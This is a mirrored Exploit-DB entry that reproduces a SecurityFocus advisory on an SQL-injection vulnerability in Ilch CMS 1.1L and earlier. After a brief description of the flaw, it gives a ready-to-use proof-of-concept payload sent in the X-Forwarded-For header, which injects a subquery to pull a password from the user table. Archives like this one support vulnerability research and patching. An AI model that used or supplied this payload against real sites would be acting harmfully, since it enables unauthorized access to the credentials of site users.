exploit-db-mirror/platforms/php/webapps/32779.txt
Offensive Security 34d65d4ca3 Updated 04_11_2014
2014-04-11 04:33:25 +00:00

12 lines
No EOL
590 B
Text
Executable file

source: http://www.securityfocus.com/bid/33665/info
Ilch CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ilch CMS 1.1L and prior versions are vulnerable.
The following proof of concept X-Forward-For header is available:
http://www.example.com', (select `pass` from prefix_user WHERE `id` > 0
ORDER BY `id` LIMIT 1)) /*